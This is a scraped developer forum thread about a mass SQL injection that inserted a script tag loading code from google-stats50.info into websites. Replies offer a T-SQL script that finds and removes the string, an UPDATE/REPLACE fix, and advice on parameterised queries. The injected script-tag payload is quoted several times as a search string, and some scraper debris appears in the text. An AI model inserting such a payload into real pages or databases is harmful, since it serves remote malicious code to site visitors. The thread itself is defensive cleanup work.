Deciphering this XSS attack [closed]
Did anybody know more information about this attack ?
I recently got this script injected in my web sites
By the way dont go on this web site since it's the source of the infection
</title><script src=http://google-stats50.**fo/***.php>
What kind of attack is it, SQL or CODE ?
By the way dont go on this web site since it's the source of the infection
The question is by what quind of attack this infectious attack occurs ?
We found it, and was not like twitter attack, it's was by request parameters in a url and inject sql directly in the parameter.
There is the SQL script produce by our sql team to clean your database who was infected
/*************************************************************************
SQL INJECTED DATABASE
*************************************************************************/
DECLARE @dbName VARCHAR(200),
@SqlString NVARCHAR(MAX),
@SearchText VARCHAR(MAX),
@SearchTextLike VARCHAR(MAX),
@NbItems INT,
@TableName VARCHAR(255),
@ColoneName VARCHAR(255),
@objId BIGINT,
@tmpSqlString NVARCHAR(MAX),
@CleanUp BIT,
@RowCount BIGINT,
@debug BIT,
@Msg VARCHAR(MAX);
SET @debug = 0; -- 1 = Additionnal prints
SET @CleanUp = 0; -- 1 = Update tables
SET @SearchText = '</tit开发者_Python百科le><script src=http://google-stats50.info/ur.php></script>';
SET @SearchTextLike = '%' + @SearchText + '%';
DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255));
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255));
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX));
DECLARE @DbToValidate TABLE (DbName VARCHAR(255));
INSERT INTO @DbToValidate
SELECT Name
FROM sys.databases
WHERE [state] = 0 AND
Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND
Name NOT LIKE 'sys%'
ORDER BY Name;
DECLARE db_cusor CURSOR FOR
SELECT DbName
FROM @DbToValidate;
OPEN db_cusor;
FETCH NEXT FROM db_cusor
INTO @dbName;
WHILE @@FETCH_STATUS = 0
BEGIN
SET @Msg = 'Traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0
BEGIN
IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName;
--Vider le contenu
DELETE FROM @QueryResults;
IF @debug = 1 PRINT '2 - Vider la table @QueryResults';
IF @CleanUp = 0
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
END
ELSE
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''
END
INSERT INTO @QueryResults
EXEC sp_executesql @SqlString;
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTPRINC
END
IF @debug = 1 PRINT '3 - Récupérer les Query String';
--Faire une loop sur les querys string pour voir s'il y a des injections SQL
DECLARE query_cursor CURSOR FOR
SELECT SqlString, TableName, ColoneName
FROM @QueryResults;
OPEN query_cursor;
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
IF @debug = 1 PRINT '4 - Cursor sur les Query String';
WHILE @@FETCH_STATUS = 0
BEGIN
SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');'
EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF ISNULL(@objId, -1) <> -1
BEGIN
SET @SqlString = 'USE [' + @dbName + '];' + @SqlString;
IF @CleanUp = 0
BEGIN
EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output
END
ELSE
BEGIN
EXEC sp_executesql @SqlString
SET @RowCount = @@ROWCOUNT
END
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF @CleanUp = 0
BEGIN
IF ISNULL(@NbItems, 0) <> 0
BEGIN
-- BD Infectée !
INSERT INTO @InfectedDB VALUES (@dbName);
PRINT '**** BD Infectée : ' + @dbName;
SELECT * FROM @InfectedDB;
BREAK;
END
END
ELSE
BEGIN
IF @RowCount <> 0
BEGIN
SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7));
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
END
END
NEXTINNER:
-- Get the next query.
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
END
CLOSE query_cursor;
DEALLOCATE query_cursor;
IF @debug = 1 PRINT '5 - Vider cursor query';
END
ELSE
BEGIN
SET @Msg = '**** La base de données n''est pas ''ONLINE''.';
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
SET @Msg = 'Fin traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
NEXTPRINC:
-- Get the next database.
FETCH NEXT FROM db_cusor
INTO @dbName;
END
IF @CleanUp = 0
BEGIN
SELECT * FROM @InfectedDB;
END
ELSE
BEGIN
SELECT * FROM @CleanedUpDB;
END
GOTO FIN
FININNER:
CLOSE query_cursor;
DEALLOCATE query_cursor;
FIN:
--Fermeture du cursor
CLOSE db_cusor;
DEALLOCATE db_cusor;
Just happened to us as well. Almost every record in the database.
The best bet is to do the following: (we have just done this successfully)
UPDATE [mytable] set [column] =
REPLACE([column],
'</title><script src=http://google-stats50.info/ur.php>',
'')
That line will remove the script from each field. You will have to manually check the fields though and change the UPDATE statement to suit.
I am taking a guess that every one of you has a form on your website with a submit button. I am also guessing that the forms action involves a sql statement with concatenated sql?
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \
name & "', '" & email & "', '" & enquiry & "');"
If this is the case, you got SQL injection hacked and you should probably change all statements that use this syntax to "parameterised queries"
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"
sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz
Hopefully this helps..
Classic XSS attack. You should be checking your inputs for HTML tags and removing them. If you are allowing people to post HTML tags then you should use a whitelist for allowed tags (and allowed tag attributes, so they can't do "onClick", for example) rather than trying to block ones you can think of that might cause trouble.
We got the same problem this morning. classic case of sql injection: you don't seem to check the parameters you got via URL. take a look to the webserver access logs - you will see update statements!
I've fixed a similar hack recently, every .asp, .js and .html file on the infected server had an extra script included, but the database was normal. In that case the hack was done via FTP, the password was not strong enough. Maybe something similar happened to you?
I've fixed it with a find-and-replace-all in a text-editor supporting multiple documents at once. (notepad++)
加载中,请稍侯......
精彩评论